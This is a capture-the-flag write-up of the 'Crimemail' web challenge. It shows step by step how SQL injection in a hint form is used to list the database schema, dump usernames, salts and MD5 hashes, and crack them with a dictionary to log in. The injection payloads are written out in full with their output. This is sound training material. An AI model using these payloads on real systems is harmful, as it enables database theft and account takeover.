# ▼▼▼Crimemail - WEB 20 190/549=34.6％▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
rvice, to communicate with his associates.
Let's see if you can hack your way in his account...
Hint: his password's md5 is computed as followed: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an english dictionary
```

---

**【Search for vulnerabilities】**

```
POST /hint.php HTTP/1.1
Host: crimemail.ctf.insecurity-insa.fr
Connection: close
Content-Length: 12
Cache-Control: max-age=0
Origin: https://crimemail.ctf.insecurity-insa.fr
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://crimemail.ctf.insecurity-insa.fr/forgot.php
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Cookie: scoreboard=e72d247aba1e8bf23b45240642d98732d1505c8e; PHPSESSID=06ig4gvui8hni0urb7p5bo7rg0

username=%27
```

↓

`username='or'1'='1'--+` ⇒Content-Length: 1331

`username='or'1'='0'--+` ⇒Content-Length: 953

↓

**A SQL injection vulnerability exists!!**

---

**【Get table name】**

username= `'UNION/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA=database()+--+`

↓

```
array(1) {
[0]=>
array(1) {
["hint"]=>
string(5) "users"
}
}
```

↓

**users tables exists!!**

---

**【Get columns name】**

username= `'UNION/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/TABLE_SCHEMA=database()+--+`

↓

```
array(5) {
[0]=>
array(1) {
["hint"]=>
string(6) "userID"
}
[1]=>
array(1) {
["hint"]=>
string(8) "username"
}
[2]=>
array(1) {
["hint"]=>
string(9) "pass_salt"
}
[3]=>
array(1) {
["hint"]=>
string(8) "pass_md5"
}
[4]=>
array(1) {
["hint"]=>
string(4) "hint"
}
}
```

↓

**columuns name are `userID`, `username`, `pass_salt`, `pass_md5`, `hint` !!**

---

**【Get the value of username column】**

username= `'UNION/**/select/**/username/**/from/**/users--+`

↓

```
array(5) {
[0]=>
array(1) {
["hint"]=>
string(9) "p.escobar"
}
[1]=>
array(1) {
["hint"]=>
string(7) "g.dupuy"
}
[2]=>
array(1) {
["hint"]=>
string(8) "a.capone"
}
[3]=>
array(1) {
["hint"]=>
string(8) "c.manson"
}
[4]=>
array(1) {
["hint"]=>
string(8) "c.hackle"
}
}
```

---

**【Get the value of the column】**

username= `'UNION/**/select/**/group_concat(userID,":",username,":",pass_salt,":",pass_md5,":",hint)/**/from/**/users/**/where/**/userID=5--+`

↓

```
array(1) {
[0]=>
array(1) {
["hint"]=>
string(76) "5:c.hackle:yhbG:f2b31b3a7a7c41093321d0c98c37f5ad:I don't need any hints man!"
}
}
```

---

Subsequently acquired similarly

`pass_salt`

↓

`Jdhy`, `Kujh`, `hTjl`, `YbEr`, `yhbG`

---

`pass_md5`

↓

`c4598aadc36b55ba1a4f64f16e2b32f1`, `0fd221fc1358c698ae5db16992703bcd`, `23afc9d3a96e5c338f7ba7da4f8d59f8`, `fe3437f0308c444f0b536841131f5274`,
`f2b31b3a7a7c41093321d0c98c37f5ad`

---

**【Identify password】**

`Hint: his password's md5 is computed as followed: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an english dictionary`

↓

`md5` and `$salt` is known

`$password` are passwordlist

↓

In the local environment, we **brute force using the password list** and identified the password

↓

c4598aadc36b55ba1a4f64f16e2b32f1　⇒　 I could not find it

0fd221fc1358c698ae5db16992703bcd　⇒　I could not find it

23afc9d3a96e5c338f7ba7da4f8d59f8 ⇒　`scarface`

fe3437f0308c444f0b536841131f5274 　 ⇒　`murders`

f2b31b3a7a7c41093321d0c98c37f5ad 　⇒　`pizza`

---

I logged in with `c.hackle` and `pizza`

↓

```
UNKNOWN SENDER says:
Meet me at INSA{s3cr3t_l0cat10n}
```

↓

`INSA{s3cr3t_l0cat10n}`